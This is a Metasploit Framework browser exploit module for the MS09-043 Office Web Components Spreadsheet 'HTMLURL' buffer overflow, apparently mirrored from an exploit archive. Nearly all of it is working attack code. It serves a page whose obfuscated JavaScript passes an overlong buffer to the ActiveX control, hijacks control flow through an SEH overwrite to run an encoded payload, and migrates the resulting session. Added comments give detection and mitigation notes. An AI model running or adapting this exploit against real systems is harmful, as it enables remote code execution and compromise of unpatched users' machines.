Microsoft OWC Spreadsheet HTMLURL Buffer Overflow(meta)
来源:http://www.metasploit.com 作者:jduck 发布时间:2010-03-04  
##
# $Id: ms09_043_owc_htmlurl.rb 8698 2010-03-03 18:12:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	# Browser exploit module for CVE-2009-1534 / MS09-043: the Office Web
	# Components (OWC) Spreadsheet ActiveX control overflows a buffer when its
	# "HTMLURL" property is set to an overly long string. The module serves one
	# HTML page (HttpServer::HTML mixin) that instantiates the control by CLSID
	# and assigns the property from JavaScript; the overflow is turned into a
	# control-flow hijack through an SEH record (Seh mixin, generate_seh_record).
	#
	# Defender notes, all taken from the request handler below:
	#   * the served page contains an <object classid="clsid:0002E510-..."> or
	#     "clsid:0002E511-..." element and a script that assigns a very large
	#     unescape()'d literal to <objid>.HTMLURL;
	#   * every response carries the fixed header
	#     'Last-Modified: Tue, 11 Aug 2009 07:13:46 GMT';
	#   * the vendor fix is the MS09-043 update referenced in the metadata;
	#     setting the kill bit for the listed CLSIDs also stops the control
	#     from being instantiated by the browser.
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Seh

	# Module metadata. Points worth noticing:
	#   * Payload 'Space' => 1024, 'BadChars' "\x00\xf0", NOPs disabled;
	#   * 'InitialAutoRunScript' => 'migrate -f' runs as soon as a session
	#     opens (presumably a Meterpreter migrate out of the browser — confirm);
	#   * target 0's 'Ret' is the placeholder 0x42424242 (see the author's
	#     "??" comment); only target 1, the default, carries a real address.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft OWC Spreadsheet HTMLURL Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in Microsoft's Office Web Components.
				When passing an overly long string as the "HTMLURL" parameter an attacker can 
				execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'jduck' ],
			'Version'        => '$Revision: 8698 $',
			'References'     =>
				[
					[ 'CVE', '2009-1534' ],
					[ 'OSVDB', '56916' ],
					[ 'BID', '35992' ],
					[ 'MSB', 'MS09-043' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC'             => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'       => 1024,
					'BadChars'    => "\x00\xf0",
					'DisableNops' => true
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# 'ProgId' => "OWC.Spreadsheet.9"
					# 'ClassId' => "0002E512-0000-0000-C000-000000000046",
					[ 'Windows XP SP3 - IE6 - Office XP SP0',
						{
							'ClassId' => "0002E510-0000-0000-C000-000000000046",
							'Offset'  => 31337,
							'Ret'     => 0x42424242 # p/p/r in msohev.dll ??
						}
					],
					[ 'Windows XP SP3 - IE6 - Office XP SP3',
						{
							'ClassId' => "0002E511-0000-0000-C000-000000000046",
							'Offset'  => ((4096*7) + 1076),
							'Ret'     => 0x32521239 # p/p/r in msohev.dll 10.0.2609.0
						}
					]
				],
			'DisclosureDate' => 'Aug 11 2009',
			'DefaultTarget'  => 1))

		# Only option beyond the mixin defaults: the path the page is served on.
		register_options(
			[
				OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
			], self.class)
	end

	# Returning false presumably opts this module out of the framework's
	# automatic module selection (autopwn) — confirm against the base class.
	def autofilter
		false
	end

	# use_zlib presumably asserts that zlib support is available to the HTTP
	# server mixin before the module is run — confirm.
	def check_dependencies
		use_zlib
	end

	# Builds a string of exactly num random alphanumeric characters, generated
	# as pad_pages repeats of one random chunk (2048..4095 chars) plus a shorter
	# random tail, instead of a single huge rand_text call.
	# NOTE(review): both `if` guards are always true — Integers, including 0,
	# are truthy in Ruby. That is harmless: `* 0` yields "" and
	# rand_text_alphanumeric(0) presumably does as well.
	def big_alnum(num)
		divisor = 2048 + rand(2048)
		pad_pages = num / divisor   # number of whole chunks
		pad_left = num % divisor    # length of the remainder
		ret = ''
		ret << rand_text_alphanumeric(divisor) * pad_pages if pad_pages
		ret << rand_text_alphanumeric(pad_left) if pad_left
		ret
	end

	# HTTP request handler: builds the exploit buffer for the selected target,
	# wraps it in obfuscated JavaScript plus the ActiveX <object> element, and
	# sends the page to cli. The request argument is never inspected — every
	# request reaching URIPATH receives the same kind of page.
	def on_request_uri(cli, request)
		# Re-generate the payload.
		return if ((p = regenerate_payload(cli)) == nil)

		# ActiveX parameter(s)
		clsid = target['ClassId']

		# Exploitation parameter(s)
		seh_offset = target['Offset']

		# Build the buffer: [Offset bytes of filler][SEH record][payload][filler]
		# padded to 40960 bytes in total (Offset + record + payload stays below
		# that for both targets), then converted to the escaped form that
		# JavaScript unescape() decodes.
		string = big_alnum(seh_offset)
		string << generate_seh_record(target.ret)
		string << payload.encoded
		string << big_alnum(40960 - string.length)
		string = Rex::Text.to_unescape(string)

		# Random names for the <object> element id and the trigger function.
		objid = rand_text_alphanumeric(8+rand(8))
		fnname = rand_text_alphanumeric(8+rand(8))

		# Build the final JavaScript: one function that assigns the decoded
		# buffer to the control's HTMLURL property.
		js = "function #{fnname}() { var long = unescape('#{string}'); #{objid}.HTMLURL = long; }"

		# Obfuscate the javascript — only the variable `long` is renamed;
		# string obfuscation is disabled because of the literal's size.
		opts = {
			'Strings' => false, # way too slow to obfuscate this monster
			'Symbols' => {
				'Variables' => %w{ long }
			}
		}
		js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
		js.obfuscate()

		# Build the final HTML. The body's onload calls history.go(0) before the
		# trigger function; the intent is not stated here — TODO confirm.
		content = %Q|<html>
<head>
<script language=javascript>
#{js}
</script>
</head>
<body onload="history.go(0); #{fnname}()">
<object classid="clsid:#{clsid}" id="#{objid}">
</object>
</body>
</html>
|

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client. The Last-Modified value is a
		# constant, so it is identical across every page this module serves.
		send_response_html(cli, content, { 'Last-Modified' => 'Tue, 11 Aug 2009 07:13:46 GMT', })

		# Handle the payload
		handler(cli)
	end
end
 